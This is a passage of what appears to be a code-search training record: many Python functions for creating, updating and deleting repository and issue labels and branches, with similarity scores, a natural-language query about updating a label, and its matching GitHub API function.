dao.set_label(id=str(uuid.uuid4()),\n name=request.json['name'],\n fields=request.json['fields'])\n\n return jsonify(dao.get_label(label_id))", "def update_label(self, repository, name, color, old_name=None, **kwargs):\n data = {'name': name, 'color': color}\n response = self.session.patch(\n '{}/repos/{}/labels/{}'.format(\n self.GH_API_ENDPOINT, repository, old_name or name\n ),\n json=data\n )\n if response.status_code != 200:\n raise GitHubError(response)", "def create_label(self, name):\n payload = self._build_params(name=name)\n return Label.deserialize(self._post('labels', None, payload))", "def _create_label(self, label: str, ent_id: Union[str, None]) -> str:\n if isinstance(ent_id, str):\n label = \"{}{}{}\".format(label, self.ent_id_sep, ent_id)\n return label", "def add_label(self, label):\n status = self.ocp.add_label(resource_name=self.name, label=label)\n self.reload()\n return status", "def insert_new_label(self, label, index, nvals):\n if label in self.labels: return\n self.labels.append(label)\n self.parents.append(self.find_parent_label(label))\n self.maxcounts[label] = nvals\n self.subjcounts[label] = 0", "def put_label(id):\n label_id = dao.set_label(id=id,\n name=request.json['name'],\n fields=request.json['fields'])\n\n return jsonify(dao.get_label(label_id))", "def test_create_metering_label(self):\r\n resource = 'metering_label'\r\n cmd = metering.CreateMeteringLabel(\r\n test_cli20.MyApp(sys.stdout), None)\r\n name = 'my label'\r\n myid = 'myid'\r\n description = 'my description'\r\n args = [name, '--description', description, '--shared']\r\n position_names = ['name', 'description', 'shared']\r\n position_values = [name, description, True]\r\n self._test_create_resource(resource, cmd, name, myid, args,\r\n position_names, position_values)", "def createLabel(self, address: ghidra.program.model.address.Address, name: unicode, makePrimary: bool, sourceType: ghidra.program.model.symbol.SourceType) -> ghidra.program.model.symbol.Symbol:\n ...", "def newrepo():\n form = AddRepoForm()\n if form.validate_on_submit():\n\n # make the directory for this package\n os.mkdir(DATA + form.name.data)\n\n flash('Repo created successfully')\n\n # redirect to the login page\n return redirect(url_for('home.dashboard'))\n\n # load registration template\n return render_template('home/add.html', form=form, title='Local Repo', target=\"add\")", "def gracedb_add_label(gracedb_id, label):\n\n # begin GraceDB API\n client = gracedb_rest.GraceDb()\n\n # append comment to GraceDB entry\n out = client.writeLabel(gracedb_id, label)", "def add_new_label(UniqueLabelList, Label):\n\n NewLabel = {}\n NewLabel['LabelName'] = Label['Label']['Name']\n NewLabel['Confidence'] = Label['Label']['Confidence']\n NewLabel['TimeStamps'] = [Label['Timestamp']]\n NewLabel['Count'] = 1\n\t\n UniqueLabelList.append(NewLabel)\n\t\n return NewLabel", "def add_label(self, label):\n if not self.has_label(label):\n self.add_category(scheme=LABELS_SCHEME,\n term='%s#%s' % (LABELS_NS, label),\n label=label)", "def repository_create_hosted():\n pass", "def test_heads_create_new_branch_commit(repository: Repository) -> None:\n branch = repository.heads.create(\"branch\", repository.head.commit)\n assert repository.head.commit == branch.commit", "def repo_new(request):\n if request.method != 'POST':\n form = RepoForm()\n return respond(request, 'repo_new.html', {'form': form})\n form = RepoForm(request.POST)\n errors = form.errors\n if not errors:\n try:\n repo = models.Repository(\n name=form.cleaned_data.get('name'),\n url=form.cleaned_data.get('url'),\n guid=form.cleaned_data.get('guid'),\n )\n except (db.BadValueError, ValueError) as err:\n errors['__all__'] = unicode(err)\n if errors:\n return respond(request, 'repo_new.html', {'form': form})\n repo.put()\n branch_url = repo.url\n if not branch_url.endswith('/'):\n branch_url += '/'\n branch_url += 'trunk/'\n branch = models.Branch(repo_key=repo.key, repo_name=repo.name,\n category='*trunk*', name='Trunk',\n url=branch_url)\n branch.put()\n return HttpResponseRedirect(reverse(repos))", "def create_new_lab(title):\n\n lab = Lab(title=title)\n db.session.add(lab)\n db.session.commit()\n\n return lab", "def user_labels_new(*args):\n return _ida_hexrays.user_labels_new(*args)", "def create_new_node(subgraph, prev_node, label, bb):\n return add_node(subgraph, update_node_name(prev_node.get_name(), bb-1), label=update_bb_string(label, bb-1))", "def rdf_update_labels(rdf, node):\n final_list = []\n for i in node.get_labels():\n # print(i)\n final_list += rdf_get_branch(rdf, i)\n for i in final_list:\n node.add_label(i)", "def branch_new(request, repo_id):\n repo = models.Repository.get_by_id(int(repo_id))\n if request.method != 'POST':\n form = BranchForm(initial={'url': repo.url,\n 'category': 'branch',\n })\n return respond(request, 'branch_new.html', {'form': form, 'repo': repo})\n form = BranchForm(request.POST)\n errors = form.errors\n if not errors:\n try:\n branch = models.Branch(\n repo_key=repo.key,\n category=form.cleaned_data.get('category'),\n name=form.cleaned_data.get('name'),\n url=form.cleaned_data.get('url'),\n )\n except (db.BadValueError, ValueError) as err:\n errors['__all__'] = unicode(err)\n if errors:\n return respond(request, 'branch_new.html', {'form': form, 'repo': repo})\n branch.repo_name = repo.name\n branch.put()\n return HttpResponseRedirect(reverse(repos))", "def createLabel(self, address: ghidra.program.model.address.Address, name: unicode, makePrimary: bool) -> ghidra.program.model.symbol.Symbol:\n ...", "def get_label(repo, title, verbose=None):\n if verbose:\n print \"Checking for label...\"\n label = None\n label_text = None\n try:\n label_start = 1 + title.index('(')\n label_end = title.index(')')\n label_text = title[label_start:label_end]\n except ValueError, e:\n print \"Warning: This tile has no embeded label. {0}\".format(e)\n if label_text:\n try:\n label = [repo.get_label(label_text)]\n if verbose:\n print \"Found label: {0}\".format(label)\n except UnknownObjectException, e:\n print \"Error: The label '{0}' does not exist on \" \\\n \"Github. {1}\".format(label_text, e)\n return label", "def delete_label(self, repository, name, **kwargs):\n response = self.session.delete(\n '{}/repos/{}/labels/{}'.format(\n self.GH_API_ENDPOINT, repository, name\n )\n )\n if response.status_code != 204:\n raise GitHubError(response)", "def create(self, label_id):\n data = {\n 'type': 'tagit',\n 'rate_count': 0,\n 'rate_range': 'day',\n 'limit_count': 0,\n 'limit_range': 'day',\n 'schedule': [],\n 'enabled': True,\n 'args': {\n 'sn': label_id,\n 'tag_sn': label_id\n }\n }\n # Yes, it's confusing. the `/actions/` endpoint is used for tags, while\n # the /tags/ endpoint is used for labels.\n return self._post(\n request=ApiActions.CREATE.value,\n uri=ApiUri.ACTIONS.value,\n params=data\n )", "def cmd_create(self):\n self.repo.create()\n\n # Add .gitignore.\n self.repo.add_files({'.gitignore': '.swp\\n'}, FIRST_COMMIT_MSG)\n\n # Create the etc and timestamps branches.\n self.repo.checkout('etc', create=True)\n self.repo.checkout('timestamps', create=True)\n\n self.repo.checkout('master')\n self.repo.init()\n self.update_repository()\n print('Git repository created at %s' % self.repodir)", "def register_repo_create(self, body):\n httpretty.register_uri(\n httpretty.POST,\n '{url}orgs/{org}/repos'.format(\n url=self.URL,\n org=self.ORG,\n ),\n body=body\n )", "def n(label):\n global id\n node = pydot.Node(name=id, obj_dict=None, label=label)\n id += 1\n graph.add_node(node)\n return node", "def post_issue_labels(repo, project, issue_number):\n issue_path = '%s/%s/issues/%d' % (repo, project, issue_number)\n\n new_label_ids = request.json\n\n current_label_ids = dao.get_issue_label_ids(issue_path)\n\n revised_label_ids = current_label_ids + new_label_ids\n\n dao.set_issue_label_ids(issue_path, revised_label_ids)\n\n return if_found(dao.get_issue_labels(issue_path))", "def projects_label(args):\n session = GithubSession()\n\n label_datas = list(session.get_labels())\n\n team = args.team\n team_label_data = None\n if team:\n team_label = utils.get_label(team, prefix=\"team\")\n team_label_data = [x for x in label_datas if x[\"name\"] == team_label][0]\n\n # get the project label\n project_label = utils.get_label(args.name, prefix=\"project\")\n project_label_data = [x for x in label_datas if x[\"name\"] == project_label][0]\n\n print(f\"label cards in project {args.name} column {args.column}\")\n\n project_board = session.get_project(args.name)\n project_backlog_grooming = session.get_column(project_board, \"backlog grooming\")\n\n cards = list(session.get_cards(project_backlog_grooming))\n for card_data in cards:\n issue_number = utils.get_issue_number_from_card_data(card_data)\n\n print(issue_number)\n\n # add the project label\n session.add_label(project_label_data, number=issue_number)\n\n if team_label_data:\n session.add_label(team_label_data, number=issue_number)", "def test_issue_replace_labels(self):\n pass", "def test_heads_create_new_branch_at_another_branch(repository: Repository) -> None:\n main = repository.head\n branch1 = repository.heads.create(\"branch1\")\n\n repository.checkout(branch1)\n repository.commit()\n\n repository.checkout(main)\n branch2 = repository.heads.create(\"branch2\", branch1.commit)\n\n assert branch1.commit == branch2.commit", "def test_build_image(self):\n labels = {\"apple\": \"red\", \"grape\": \"green\"}\n self.docker.images.build(\n path=\"test/python/docker/build_labels\",\n labels=labels,\n tag=\"labels\",\n isolation=\"default\",\n )\n image = self.docker.images.get(\"labels\")\n self.assertEqual(image.labels[\"apple\"], labels[\"apple\"])\n self.assertEqual(image.labels[\"grape\"], labels[\"grape\"])", "def place_label(\r\n product,\r\n label_df,\r\n product_file,\r\n base_dir\r\n):\r\n # enforce match between putative filename root and label filename\r\n try:\r\n label_file = eqloc(\r\n label_df, \"filename\", product.root\r\n )[\"local_path\"].values[0]\r\n except KeyError:\r\n raise KeyError(\"Label for \" + product.root + \" not found in index.\")\r\n\r\n # check stated filename and product id\r\n with open(label_file) as file:\r\n label = file.read()\r\n enforce_name_match(label, product.root)\r\n\r\n # and then copy label to correct place\r\n shutil.copy(label_file, base_dir + product.newpath)\r\n # and finally copy source file to filepath listed in label\r\n if product_file:\r\n fn_tag = re.search(FN_PATTERN, label).group(0)\r\n shutil.copy(product_file, base_dir + product.newpath + \"/\" + fn_tag)\r\n return {\r\n 'product_id': re_search(label_file, LID_PATTERN),\r\n 'label': base_dir + product.newpath + \"/\" + product.root + \".xml\"\r\n }", "def _add_node(self, node_name, node_type):\n q = 'MATCH (r:' + node_type + ') WHERE r.name=\"' \\\n + node_name + '\" RETURN r'\n results = self.db.query(q, returns=(client.Node, str, client.Node))\n res = self.db.labels.create(node_type)\n\n if (len(results) == 0):\n r = self.db.nodes.create(name=node_name)\n res.add(r)\n else:\n r = results[0][0]\n return r", "def testEditConfigCreatePortLabel(self):\n self.ports.editconfig_create_port_label(file_name = 'editconfig_create_port_label.xml', port_ids = portsDict['port_ids'], port_labels = portsDict['port_label'])", "def add_labels(self, labels: dict):\n self.status = \"Creating labels\"\n for lname, value in labels.items():\n self.labels.add_label(lname, value)", "def test_issue_get_label(self):\n pass", "def update_labels(source_repo, service, source_service, destination):\n app = App()\n if source_repo:\n serv = app.get_service(source_service, repo=source_repo)\n else:\n serv = app.guess_service()\n repo_labels = serv.list_labels()\n if not repo_labels:\n print(\"No labels.\")\n return\n\n for repo_for_copy in destination:\n other_serv = app.get_service(service, repo=repo_for_copy)\n changes = other_serv.update_labels(labels=repo_labels)\n\n click.echo(\"{changes} labels of {labels_count} copied to {repo_name}\".format(\n changes=changes,\n labels_count=len(repo_labels),\n repo_name=repo_for_copy\n ))", "def test_issue_edit_label(self):\n pass", "def user_labels_insert(*args):\n return _ida_hexrays.user_labels_insert(*args)", "def _add_label(self):\n\n label = self._label_edit.text()\n labelNames = [i[0] for i in self.labels]\n if not label in list(labelNames):\n self.labels.append((label,0))\n self._option_selector.addItem(label)\n with open(\"{}/labels.txt\".format(self.output_directory), 'a') as file:\n file.write(\"{}\\n\".format(label))\n self._label_edit.setText('')", "def create_label2id(cfg):\n label2id_model_path = join(\n cfg.model_dir, 'labels.json')\n\n # label2id is stored in the data dir and model dir\n if not exists(label2id_model_path):\n label2id_data_path = join(\n cfg.data_dir, 'labels.json')\n\n if not exists(label2id_data_path):\n label2id = {}\n\n for label in generate_labels(\n cfg, ['train.jsonl', 'valid.jsonl']):\n if label not in label2id:\n label2id[label] = len(label2id)\n\n with open(label2id_data_path, 'w') as fh:\n json.dump(label2id, fh)\n\n else:\n with open(label2id_data_path, 'r') as fh:\n label2id = json.load(fh)\n\n with open(label2id_model_path, 'w') as fh:\n json.dump(label2id, fh)\n\n with open(label2id_model_path, 'r') as fh:\n label2id = json.load(fh)\n\n return label2id", "def add_labels_to_issue(self, installation_id, repo_owner, repo_name,\n issue_num, predictions):\n # take an action if the prediction is confident enough\n if predictions['labels']:\n label_names, label_probabilities = self.filter_specified_labels(repo_owner,\n repo_name,\n predictions)\n else:\n label_names = []\n\n # get the isssue handle\n issue = get_issue_handle(installation_id, repo_owner, repo_name, issue_num)\n\n if label_names:\n # create message\n message = \"\"\"Issue-Label Bot is automatically applying the labels `{labels}` to this issue, with the confidence of {confidence}.\n Please mark this comment with :thumbsup: or :thumbsdown: to give our bot feedback!\n Links: [app homepage](https://github.com/marketplace/issue-label-bot), [dashboard]({app_url}data/{repo_owner}/{repo_name}) and [code](https://github.com/hamelsmu/MLapp) for this bot.\n \"\"\".format(labels=\"`, `\".join(label_names),\n confidence=\", \".join([\"{:.2f}\".format(p) for p in label_probabilities]),\n app_url=self.app_url,\n repo_owner=repo_owner,\n repo_name=repo_name)\n # label the issue using the GitHub api\n issue.add_labels(*label_names)\n logging.info(f'Add `{\"`, `\".join(label_names)}` to the issue # {issue_num}')\n else:\n message = \"\"\"Issue Label Bot is not confident enough to auto-label this issue.\n See [dashboard]({app_url}data/{repo_owner}/{repo_name}) for more details.\n \"\"\".format(app_url=self.app_url,\n repo_owner=repo_owner,\n repo_name=repo_name)\n logging.warning(f'Not confident enough to label this issue: # {issue_num}')\n\n # make a comment using the GitHub api\n comment = issue.create_comment(message)", "def test_heads_setitem_new(repository: Repository) -> None:\n repository.heads[\"branch\"] = repository.head.commit\n assert repository.head.commit == repository.heads[\"branch\"]", "def test_issue_delete_label(self):\n pass", "def post(self):\n if not request.json:\n return None, 400\n\n created_git_repository: GitRepositoryModel = self.datastore.create(document=request.json)\n return created_git_repository, 201", "def setLabel(*args):", "def setLabel(*args):", "def setLabel(*args):", "def setLabel(*args):", "def setLabel(*args):", "def write_label(self, label: str) -> None:\n self._write(f'({self._file_name}${label})')", "def labels_by_name(self, username, repository_name, access_token=None):\n return self._complete_request_by_name(\n username, repository_name, \"labels\", access_token)", "def test_heads_create_existing_branch(repository: Repository) -> None:\n heads = repository.heads\n branch = heads.create(\"branch\", repository.head.commit)\n with pytest.raises(pygit2.AlreadyExistsError):\n heads.create(branch.name, branch.commit)", "def __init__(self, label):\n self.label = label", "def create(client, args):\n\n\tdef validate_description(text):\n\t\tif len(text) == 0:\n\t\t\tprint 'Description may not be empty. Try again.'\n\t\t\treturn False\n\t\treturn True\n\n\tdef validate_name(text):\n\t\tif len(text) == 0:\n\t\t\tprint 'Name may not be empty. Try again.'\n\t\t\treturn False\n\t\tif any(char for char in text if char.isspace()):\n\t\t\tprint 'Name may not contain spaces. Try again.'\n\t\t\treturn False\n\t\t# What other characters don't belong in the name?\n\t\treturn True\n\n\tdef validate_homepage(text):\n\t\t# This is a lame excuse for validation.\n\t\tif len(text) == 0:\n\t\t\tprint 'Home page may not be empty. Try again.'\n\t\t\treturn False\n\t\treturn True\n\n\tname = read_user_input('Repository name', validate_name)\n\thomepage = read_user_input('Homepage', validate_homepage)\n\tdescription = read_user_input('Description', validate_description)\n\tprint client.repos.create(name, description, homepage)", "def create_label(self, on, text: str):\n return tk.Label(on, font=self.FONT, bg=self.BG_COLOR, text=text)", "def test_create_repository(koan, assert_repo_exists):\n koan.shell('')", "def addAutolabel(call, args=(), kwargs={}, nodeClass='*'):", "def new_repo(req, source, psp_dir, url_helper=None):\n req.content_type = 'text/html'\n repo_dir = req.filename.rsplit('/', 1)[0]\n files = [f for f in os.listdir(repo_dir) if f[-3:] == '.h5']\n top_level = psp.PSP(req, filename=psp_dir+'new_repo.psp')\n top_level.run({'context': req.uri,\n 'files': files})", "def add(name, url):\n click.echo(\"registered repo {} at url {}\".format(name, url))", "def test__create_label_w_no_ent_id(ruler: SpaczzRuler) -> None:\n assert ruler._create_label(\"TEST\", None) == \"TEST\"", "def test_issue_remove_label(self):\n pass", "def __add_new_label(self, name, value):\n self.__labels_dict[name] = value", "def create_code_repository(CodeRepositoryName=None, GitConfig=None):\n pass", "def add(self, label):\n return_type = Term(self.context)\n self.add_child(return_type)\n\n def _set_loaded():\n term_create_info = {\n \"labels\": ClientValueCollection(LocalizedLabel, [LocalizedLabel(label)])\n }\n qry = CreateEntityQuery(self, term_create_info, return_type)\n self.context.add_query(qry)\n\n self._parent_set.ensure_property(\"id\", _set_loaded)\n return return_type", "def on_save_label(self, image_id, label_id):\n logger.info(f\"New label saved for: {image_id} => {label_id}\")", "def setup_label(self, node):\n self._options['id'] = node.argument", "def add(self, key, label):\n self.labels[key] = label", "def addTag(self, repoType, txt, addSlash=True, project=0):\n # remove slash\n while txt.startswith(\"/\"):\n txt = txt[1:]\n \n # add fix to support & in filename, ampersand is used \n # as a shortcut for the tab by pyqt\n txt = txt.replace(\"&\", \"&&\")\n # end of fix\n \n if repoType == UCI.REPO_TESTS_LOCAL:\n repo = \"local-tests\"\n elif repoType == UCI.REPO_TESTS:\n repo = \"remote-tests\"\n project_name = self.iRepo.remote().getProjectName(project=project)\n repo += '(%s)' % project_name\n elif repoType == UCI.REPO_ADAPTERS:\n repo = \"remote-adapters\"\n elif repoType == UCI.REPO_LIBRARIES:\n repo = \"remote-libraries\"\n elif repoType == UCI.REPO_UNDEFINED:\n repo = \"undefined\"\n else:\n repo = \"unknown\"\n self.error( \"repo unknown: %s\" % repoType )\n if addSlash:\n if repoType == UCI.REPO_TESTS_LOCAL:\n ret = \"%s:%s\" % (repo, txt) \n else:\n ret = \"%s:/%s\" % (repo, txt)\n else:\n ret = \"%s: %s\" % (repo, txt) \n return ret", "def change_issues_label(self, msg, old_label, new_label):\n self._asset_bind(msg)\n yield (\"Processing....\")\n trans = self._translation_util(msg)\n client = self._github_operator(msg)\n cmd = \"repo:{} label:{} is:open type:issue\".format(\n task_repository_name(), old_label)\n issue_list = client.search_issue(cmd, 10)\n for issue in issue_list:\n trans.wait_for_limit(MAX_RESULT, MAX_RESULT)\n issue.remove_from_labels(old_label)\n issue.add_to_labels(new_label)\n yield \"{} issues has been changed label from {} to {}\".format(len(issue_list), old_label, new_label)", "def add_label(self, label_key, label_value):\n # type: (str, str) -> bool\n headers = Headers({\"content-type\": \"application/json\", \"accept\": \"application/json\"})\n response_result = self.connection.api_call(\n \"PUT\",\n [\n \"v1\",\n \"datasets\",\n self.dataset_id,\n \"resources\",\n self.id,\n \"labels\",\n label_key,\n label_value,\n ],\n headers=headers,\n )\n\n if response_result:\n # Sync the latest data from API to prevent inconsistency\n self.refresh()\n\n return True", "def _add_label_switching_node( self,\n node_tree,\n label_vec,\n last_element,\n label_ID_node=None,\n node_index=0,\n uv_map=None, \n node_offset=[0,0]):\n\n # define local variables #######################################################################################\n _step_node_width = 200 # x seperation of nodes\n _step_node_height = 200 # y seperation of nodes\n ################################################################################ end of define local variables #\n\n # create image ID handle #######################################################################################\n if label_ID_node is None:\n label_ID_node = node_tree.node_tree.nodes.new(\"ShaderNodeValue\")\n label_ID_node.location = ((node_offset[0]-400,node_offset[1]-100))\n label_ID_node.name = \"label_step_ID\"\n label_ID_node.label = \"label_step_ID\"\n label_ID_node.outputs[0].default_value = 1\n ############################################################################### end of create image ID handle #\n\n # create image nodes ###########################################################################################\n _x_offset = (node_index+1)*_step_node_width + node_offset[0]\n _y_offset = (node_index+1)*_step_node_height + node_offset[1]\n\n _semantic_node_offset = [(node_index+1)*_step_node_width*2 + node_offset[0]-1000,(node_index+1)*\\\n _step_node_height + node_offset[1]+200]\n\n _semantic_tree, self._semantic_pass_id = self.create_semantic_nodes(node_tree=self._world_node_tree,\n label_ID_vec=label_vec,\n num_label_per_channel=15, # TODO add in script\n env_mode=True,\n uv_map=uv_map,\n node_offset=_semantic_node_offset)\n\n _semantic_tree.inputs[0].default_value = 1\n\n # create new mix node ######################################################################################\n _current_mix_shader_node = node_tree.node_tree.nodes.new(\"ShaderNodeMixRGB\")\n _current_mix_shader_node.location = (((node_index+1)*_step_node_width*2 + node_offset[0],\n (node_index+1)*_step_node_height + node_offset[1]))\n ############################################################################### end of create new mix node #\n\n # create compare node ######################################################################################\n _current_compare_node = node_tree.node_tree.nodes.new(\"ShaderNodeMath\")\n _current_compare_node.location = (((node_index+1)*_step_node_width*2 + node_offset[0],\n node_offset[1]-_step_node_height))\n _current_compare_node.operation = 'COMPARE'\n _current_compare_node.inputs[0].default_value = node_index\n _current_compare_node.inputs[2].default_value = 0 # delta value should be zero for equal comparison\n ############################################################################### end of create compare node #\n\n\n # link nodes togther #######################################################################################\n node_tree.node_tree.links.new(_current_mix_shader_node.inputs[0], _current_compare_node.outputs[0])\n if last_element is not None:\n node_tree.node_tree.links.new(_current_mix_shader_node.inputs[1], last_element.outputs[0])\n node_tree.node_tree.links.new(_current_mix_shader_node.inputs[2], _semantic_tree.outputs[0])\n \n node_tree.node_tree.links.new(_current_compare_node.inputs[1], label_ID_node.outputs[0])\n ################################################################################ end of link nodes togther #\n #################################################################################### end of create image nodes #\n\n # return last mix shader node\n return _current_mix_shader_node, label_ID_node", "def create_dev():\n bucket_name = \"issue-label-bot-dev_secrets\"\n blob_name = \"kf-label-bot-dev.2019-12-30.private-key.pem\"\n\n storage_client = storage.Client()\n\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(blob_name)\n contents = blob.download_as_string().decode()\n\n subprocess.check_call([\"kubectl\", \"-n\", \"label-bot-dev\", \"create\",\n \"secret\", \"generic\",\n \"github-app\",\n f\"--from-literal=kf-label-bot-dev.private-key.pem=\"\n f\"{contents}\"])", "def create_prod():\n bucket_name = \"github-probots_secrets\"\n blob_name = \"issue-label-bot-github-app.private-key.pem\"\n namespace = \"label-bot-prod\"\n storage_client = storage.Client()\n\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(blob_name)\n contents = blob.download_as_string().decode()\n\n subprocess.check_call([\"kubectl\", \"-n\", namespace, \"create\",\n \"secret\", \"generic\",\n \"github-app\",\n f\"--from-literal={blob_name}=\"\n f\"{contents}\"])", "def create_labels(self):\n for name in self.names:\n temp_button = Label(text=name)\n self.root.ids.label_box.add_widget(temp_button)", "def add_label(self, label, name, label_type):\n assert label_type in ['label', 'prediction', 'guide'], \\\n \"{} not in ['label', 'prediction', 'guide']: Must select an acceptable type\".format(label_type)\n check_numpy_table(label, req_fields=('raw_start', 'raw_length', 'reference_index',\n 'kmer', 'posterior_probability'))\n\n # label.sort(order=['raw_start'], kind='mergesort')\n # check the labels are in the correct format\n assert min(label[\"raw_start\"]) >= 0, \"Raw start cannot be less than 0\"\n assert 0 <= max(label[\"posterior_probability\"]) <= 1, \\\n \"posterior_probability must be between zero and one {}\".format(row[\"posterior_probability\"])\n\n # make sure last label can actually index the signal correctly\n try:\n self.scaled_signal[label[-1][\"raw_start\"]:label[-1][\"raw_start\"] + label[-1][\"raw_length\"]]\n except IndexError:\n raise IndexError(\"labels are longer than signal\")\n\n label1 = np.sort(label, order=['raw_start'], kind='mergesort')\n\n # infer strand alignment of read\n if label1[0][\"reference_index\"] >= label1[-1][\"reference_index\"]:\n minus_strand = True\n else:\n minus_strand = False\n if self.minus_strand is not None:\n if label[0][\"raw_start\"] != label[-1][\"raw_start\"]:\n assert self.minus_strand == minus_strand, \"New label has different strand direction, check label\"\n else:\n self.minus_strand = minus_strand\n\n # set label with the specified name\n if label_type == 'label':\n self.label[name] = label\n elif label_type == 'prediction':\n self.prediction[name] = label\n elif label_type == 'guide':\n self.guide[name] = label" ]
[ "0.7274326", "0.7140176", "0.67611367", "0.6694404", "0.6539713", "0.6458034", "0.64482284", "0.6406368", "0.63728607", "0.6343112", "0.6218493", "0.6180373", "0.6086001", "0.6058881", "0.60423875", "0.6024324", "0.6002186", "0.5988165", "0.5969681", "0.59262604", "0.5906312", "0.5893694", "0.5886118", "0.5861668", "0.5831134", "0.5828109", "0.580204", "0.57648677", "0.57189536", "0.5704992", "0.56976706", "0.56860906", "0.56598115", "0.56492805", "0.56408876", "0.563351", "0.56220114", "0.5621547", "0.5615955", "0.5613129", "0.5607477", "0.5603894", "0.56021714", "0.56011724", "0.5596951", "0.5583017", "0.5558753", "0.5558366", "0.5557851", "0.5522138", "0.5521191", "0.55082715", "0.55035114", "0.5495573", "0.5495313", "0.54899746", "0.5478845", "0.5465398", "0.54598475", "0.5450151", "0.54483503", "0.5447826", "0.54470825", "0.54429656", "0.54411167", "0.5439321", "0.5411056", "0.5410814", "0.540336", "0.53913426", "0.53913426", "0.53913426", "0.53913426", "0.53913426", "0.5374932", "0.5372577", "0.53615445", "0.5360129", "0.5353352", "0.5345057", "0.53447485", "0.53386503", "0.5330407", "0.5329372", "0.532708", "0.53264445", "0.53252447", "0.53235763", "0.5322305", "0.5317826", "0.53135294", "0.5309483", "0.52996707", "0.5281938", "0.5267931", "0.5264457", "0.526259", "0.52574563", "0.52538604", "0.52290124" ]
0.77359784
0
Update existing label in given repository
def update_label(self, repository, name, color, old_name=None, **kwargs): data = {'name': name, 'color': color} response = self.session.patch( '{}/repos/{}/labels/{}'.format( self.GH_API_ENDPOINT, repository, old_name or name ), json=data ) if response.status_code != 200: raise GitHubError(response)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_labels(repo: Repository, labels: list[Label]):\n\n log.info(f\"Fetching existing labels from {repo.full_name}\")\n existing_labels = {label.name.casefold(): label for label in repo.get_labels()}\n log.info(f\"Found {len(existing_labels)} existing labels\")\n\n for label in labels:\n qualified_name = label.qualified_name\n folded_name = qualified_name.casefold()\n if folded_name not in existing_labels:\n log.info(f\"Creating label {qualified_name}\")\n repo.create_label(**label.api_arguments)\n elif label != existing_labels[folded_name]:\n log.info(f\"Updating label {qualified_name}\")\n existing_label = existing_labels[folded_name]\n existing_label.edit(**label.api_arguments)\n else:\n log.info(f\"Label {qualified_name} already exists\")", "def UpdateLabel(self) -> _n_6_t_0:", "def updatelabel(task, label, eid):\n ServerManager.get()\n result = ServerManager.api.update_property(task, eid, prop='label', value=label)\n if result.response_type == 'success':\n click.echo(click.style(result.message, fg='green'))\n else:\n click.echo(click.style(result.message, fg='red'))", "def update_labels(source_repo, service, source_service, destination):\n app = App()\n if source_repo:\n serv = app.get_service(source_service, repo=source_repo)\n else:\n serv = app.guess_service()\n repo_labels = serv.list_labels()\n if not repo_labels:\n print(\"No labels.\")\n return\n\n for repo_for_copy in destination:\n other_serv = app.get_service(service, repo=repo_for_copy)\n changes = other_serv.update_labels(labels=repo_labels)\n\n click.echo(\"{changes} labels of {labels_count} copied to {repo_name}\".format(\n changes=changes,\n labels_count=len(repo_labels),\n repo_name=repo_for_copy\n ))", "def _apply_label(self, label):\n data = {\n \"name\" : label.title,\n \"description\" : label.desc,\n \"color\" : label.color\n }\n resp = self._post(\n self._base + \"/labels\", data=self._format_data(data))", "def rdf_update_labels(rdf, node):\n final_list = []\n for i in node.get_labels():\n # print(i)\n final_list += rdf_get_branch(rdf, i)\n for i in final_list:\n node.add_label(i)", "def change_issues_label(self, msg, old_label, new_label):\n self._asset_bind(msg)\n yield (\"Processing....\")\n trans = self._translation_util(msg)\n client = self._github_operator(msg)\n cmd = \"repo:{} label:{} is:open type:issue\".format(\n task_repository_name(), old_label)\n issue_list = client.search_issue(cmd, 10)\n for issue in issue_list:\n trans.wait_for_limit(MAX_RESULT, MAX_RESULT)\n issue.remove_from_labels(old_label)\n issue.add_to_labels(new_label)\n yield \"{} issues has been changed label from {} to {}\".format(len(issue_list), old_label, new_label)", "def put_labels():\n dao.delete_all_labels()\n for label in request.json:\n if 'id' not in label or not label['id']:\n label['id'] = str(uuid.uuid4())\n dao.set_label(id=label['id'],\n name=label['name'],\n fields=label['fields'])\n return if_found(dao.get_labels())", "def label(self, name):\r\n return labels.RepoLabel(self, name)", "def update_label(self, uuid, name):\n payload = self._build_params(uuid=uuid, name=name)\n return Label.deserialize(self._post('labels', None, payload))", "def update_from_repo():\n\treturn", "def update(self, src, labels): # real signature unknown; restored from __doc__\n pass", "def put(self, id):\n context = request.environ.get('context')\n resp = dbapi.netdevices_labels_update(context, id, request.json)\n response = {\"labels\": list(resp.labels)}\n return response, 200, None", "def _update_label(self, outer_pos, inner_pos, new_label):\n r, c = outer_pos\n ir, ic = inner_pos\n self.inner_boards[r][c][ir][ic][\"text\"] = new_label", "def delete_label(self, repository, name, **kwargs):\n response = self.session.delete(\n '{}/repos/{}/labels/{}'.format(\n self.GH_API_ENDPOINT, repository, name\n )\n )\n if response.status_code != 204:\n raise GitHubError(response)", "def put_label(id):\n label_id = dao.set_label(id=id,\n name=request.json['name'],\n fields=request.json['fields'])\n\n return jsonify(dao.get_label(label_id))", "def push_to_github(label):\n\n # Make sure we're in the right place to do all the git things.\n os.chdir(taas.data_root())\n\n # If there's nothing to do, then do nothing.\n if (not something_to_commit()):\n print(\"Nothing to commit.\")\n return\n\n branch_name = datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n\n branch_name += \"-\" + label\n\n run([\"git\", \"checkout\", \"-b\", branch_name])\n\n run([\"git\", \"add\", \"-A\"])\n\n run([\"git\", \"status\"])\n\n run([\"git\", \"commit\", \"-m\", \"Automated update: \"+label])\n\n run([\"git\", \"push\", \"--set-upstream\", \"origin\", branch_name])", "def update_label(label1, label2, idx):\n for i in range(0, len(idx)):\n label1[i] = label2[idx[i]]\n return label1", "def label_experiment(self, exp_id):\n exp = experiment.experiment(new_experiment=False, ts=str(exp_id))\n label = request.form.get('label')\n exp.update_metadata(change_label=True, label=label)\n\n return \"OK\"", "async def new_label(event, gh, *args, **kwargs):\n if event.data[\"label\"][\"name\"] == TRIVIAL_LABEL:\n issue_number_found = ISSUE_RE.search(\n event.data[\"pull_request\"][\"title\"])\n if issue_number_found:\n status = create_success_status(issue_number_found)\n else:\n status = TRIVIAL_STATUS\n await _post_status(event, gh, status)", "def create_label(self, repository, name, color, **kwargs):\n data = {'name': name, 'color': color}\n response = self.session.post(\n '{}/repos/{}/labels'.format(self.GH_API_ENDPOINT, repository),\n json=data\n )\n if response.status_code != 201:\n raise GitHubError(response)", "def add_label(self, label):\n status = self.ocp.add_label(resource_name=self.name, label=label)\n 